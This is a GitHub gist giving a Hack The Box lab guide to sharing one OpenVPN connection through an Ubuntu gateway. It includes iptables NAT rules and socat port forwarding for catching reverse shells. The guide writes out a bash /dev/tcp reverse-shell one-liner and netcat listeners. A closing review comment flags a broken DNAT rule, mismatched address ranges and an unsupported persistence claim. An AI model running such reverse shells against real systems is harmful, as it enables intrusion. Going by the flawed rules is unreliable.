@faisalfs10x
Created May 15, 2023 13:45

Revisions

  1. faisalfs10x created this gist May 15, 2023.
    132 changes: 132 additions & 0 deletions vpn-gateway.md
    @@ -0,0 +1,132 @@
    #### Set up an HTB (Hack The Box) OpenVPN client in Ubuntu 18 to act as a VPN gateway and forward traffic from your LAN, which includes a Kali machine, to the internal network of HTB.

    ---

    - Problem: OpenVPN allow single connection concurrently to connect to the HTB lab. Hence, we can't distribute the OpenVPN config file to others as it will kick out the previously connected user.
    - What to expect: Able to share connection with multiple clients within the same network to HTB lab via Ubuntu server as VPN gateway.
    - Issue to expect: 1) Could not establish reverse shell directly to Kali machine.
    - Workaround: 1) Use port forwarder eg, use socat or iptables in Ubuntu gateway and forward to Kali machine
    ---

    ![image](https://user-images.githubusercontent.com/51811615/238352314-b44d2495-90fb-4cca-8eb9-88ad4afdec56.png)

    #### 1) Update & install openvpn.
    ```
    ubuntu> sudo apt update -y && sudo apt install openvpn -y
    ```

    #### 2) Copy the OpenVPN configuration file to the /etc/openvpn/ directory.
    ```
    ubuntu> sudo cp /path/to/your/htb.ovpn /etc/openvpn/
    ```

    #### 3) Edit the OpenVPN configuration file to enable traffic forwarding. Find redirect-gateway and remove the # at the beginning to uncomment it.
    ```
    ubuntu> sudo nano /etc/openvpn/htb.ovpn
    ```

    #### 4) Enable IP forwarding in Ubuntu. Uncomment the line `net.ipv4.ip_forward=1` by removing the # at the beginning. Then, apply it.
    ```
    ubuntu> sudo nano /etc/sysctl.conf
    # uncomment the line `net.ipv4.ip_forward=1`
    ubuntu> sudo sysctl -p
    ```

    #### 5) Start the OpenVPN service using the HTB configuration file.
    ```
    ubuntu> sudo openvpn --config /etc/openvpn/htb.ovpn --daemon
    ```

    #### 6) Configure routing and NAT on the Ubuntu machine.
    ```
    ubuntu> sudo iptables -t nat -A POSTROUTING -o tun0 -j MASQUERADE # rule 1
    ubuntu> sudo iptables -A FORWARD -i tun0 -o ens33 -m state --state RELATED,ESTABLISHED -j ACCEPT # rule 2
    ubuntu> sudo iptables -A FORWARD -i ens33 -o tun0 -j ACCEPT # rule 3
    ```

    ###### *rule 1 - adds a rule to the NAT table for outgoing packets (-o tun0), the source IP address should be replaced with the IP address of the interface tun0 using the MASQUERADE target (-j MASQUERADE).
    ###### *rule 2 - adds a rule to the FORWARD chain allows forwarding of packets from the tun0 interface (-i tun0) to the ens33 interface (-o ens33) if the packets are part of an established or related connection (-m state --state RELATED,ESTABLISHED).
    ###### *rule 3 - add rule to the FORWARD chain allows forwarding of packets from the ens33 interface (-i ens33) to the tun0 interface (-o tun0) without any restrictions.


    #### 7) Make the IP forwarding and iptables rules persistent.
    ```
    ubuntu> sudo apt install iptables-persistent
    ubuntu> sudo reboot
    ```

    ###### After rebooting, the Ubuntu machine should act as a VPN gateway, forwarding traffic from LAN to the internal network of HTB lab via the OpenVPN connection (tun0).
    ###### Make sure the Kali machine is connected to the LAN and has access to the internet.

    #### 8) Configure a static route in clients eg Kali machine for the HTB lab network `192.168.200.0/24` with the next hop gateway IP address Ubuntu machine (`192.168.8.220`) as its default gateway. If you have any additional network later, just repeat this step.
    ```
    kali> sudo ip route add 192.168.200.0/24 via 192.168.8.220
    ```

    #### 9) Verify if the routing information works. You should see the routing table updated with third entry. Please note that the actual output of the route -n command may vary depending on your specific network configuration.
    ```
    kali> route -n
    Kernel IP routing table
    Destination Gateway Genmask Flags Metric Ref Use Iface
    0.0.0.0 192.168.8.1 0.0.0.0 UG 0 0 0 eth0
    192.168.8.0 0.0.0.0 255.255.255.0 U 0 0 0 eth0
    192.168.200.0 192.168.8.220 255.255.255.0 UG 0 0 0 eth0
    ```

    #### 10) Try pinging a host within the HTB network.
    ```
    kali> ping <HTB_target>
    ```

    ###### * You can also check the OpenVPN logs on the Ubuntu machine (`/var/log/openvpn.log`) for any errors or connection issues, or just `sudo grep -i vpn /var/log/syslog`

    ---

    - Issue to expect: Could not establish reverse shell directly to Kali machine.
    - Workaround: Use port forwarder eg, use socat or iptables in Ubuntu gateway and forward to Kali machine

    ### For receiving incoming port:

    #### Method 1 using socat.
    ###### Use socat to forward any TCP incoming port to the Kali machine. Socat will listen on <local_port> on the Ubuntu machine, and any incoming traffic will be forwarded to <Kali_machine_IP>:<Kali_port>. Make sure the necessary firewall rules are in place to allow incoming connections on <local_port>.

    #### 1) Listen in Kali
    ```
    kali> nc -lvp 9999
    ```
    #### 2) Setup socat in Ubuntu gateway to forward traffic to Kali machine
    ```
    ubuntu> socat TCP-LISTEN:9999,fork TCP:<Kali_machine_IP>:9999 & # append '&' to run in the background
    ```
    #### 3) Setup reverse shell to Ubuntu gateway
    ```
    HTB_target> bash -i >& /dev/tcp/<Ubuntu_gateway>/9999 0>&1
    ```

    #### Method 2 using iptables.
    ###### Considering we are in trusted LAN, to forward any port from the range of 8000 to 9000 to the LAN network (192.168.21.0/24) to receive a reverse shell, you can use the following steps:

    #### 1) Configure iptables rules. Assuming client machines in LAN are assigned with 192.168.21.0/24.
    ###### * This is not OPSEC safe as we are forwarding traffic to entire subnet. Anyone listening could capture the connection. For better OPSEC, please specify IP of Kali machine.
    ```
    ubuntu> sudo iptables -t nat -A PREROUTING -p tcp --dport 8000:9000 -j DNAT --to-destination 192.168.21.0:8000-9000
    ubuntu> sudo iptables -t nat -A POSTROUTING -d 192.168.21.0/24 -p tcp --dport 8000:9000 -j MASQUERADE
    ubuntu> sudo iptables -A FORWARD -d 192.168.21.0/24 -p tcp --dport 8000:9000 -m state --state NEW,ESTABLISHED,RELATED -j ACCEPT
    ```

    #### 2) Save the iptables rules to persist across reboots
    ```
    ubuntu> sudo sh -c "iptables-save > /etc/iptables/rules.v4"
    ```

    ###### To establish a reverse shell connection to Kali:
    ```
    kali> nc -lvp 8888
    HTB_target> bash -i >& /dev/tcp/<Ubuntu_gateway>/8888 0>&1
    ```

    ---

    #### Reference:
    1) https://www.thegeekstuff.com/2011/02/iptables-add-rule/
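
Review bot: In Method 2, step 1, the PREROUTING rule's `--to-destination 192.168.21.0:8000-9000` rewrites every matched connection to the single address 192.168.21.0, which is the network address of the /24, so it does not reach a listener on the subnet as the note above it implies. The rule also has no `-i tun0`, so TCP traffic to ports 8000-9000 arriving from the LAN side is rewritten as well. Suggest making the Kali address the only documented form, for example `-i tun0 -p tcp --dport 8000:9000 -j DNAT --to-destination <Kali_machine_IP>`, narrowing the matching POSTROUTING and FORWARD rules to that host, and dropping the subnet variant instead of footnoting it as not OPSEC safe. The 192.168.21.0/24 range also disagrees with the 192.168.8.x addresses used in steps 8 and 9, so one of the two should be changed or explained. Separately, step 7 says the gateway works after a reboot, but step 5 starts OpenVPN by hand with `--daemon` and step 7 only installs iptables-persistent; nothing shown restarts the tunnel at boot, so either add that step or reword the claim.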